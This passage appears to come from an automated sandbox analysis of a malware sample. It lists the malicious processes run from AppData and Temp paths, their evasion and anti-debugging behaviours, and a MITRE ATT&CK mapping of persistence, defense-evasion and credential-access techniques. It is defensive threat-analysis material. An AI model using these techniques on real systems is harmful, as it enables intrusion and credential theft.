- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3036
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1136
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2232
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2832
- C:\Users\Admin\AppData\Roaming\atetbaa
  C:\Users\Admin\AppData\Roaming\atetbaa
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1244
- C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
  C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
  2⤵
  - Suspicious use of SetThreadContext
  PID:2568
- - C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
    C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
    3⤵
    PID:3444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 688
      4⤵
      Program crash
      PID:1448

C:\Users\Admin\AppData\Local\Temp\43D5.exe
C:\Users\Admin\AppData\Local\Temp\43D5.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:636

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210916204031.log C:\Windows\Logs\CBS\CbsPersist_20210916204031.cab
1⤵
- Drops file in Windows directory
PID:1096

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
1⤵
PID:2880

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
1⤵
PID:3144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery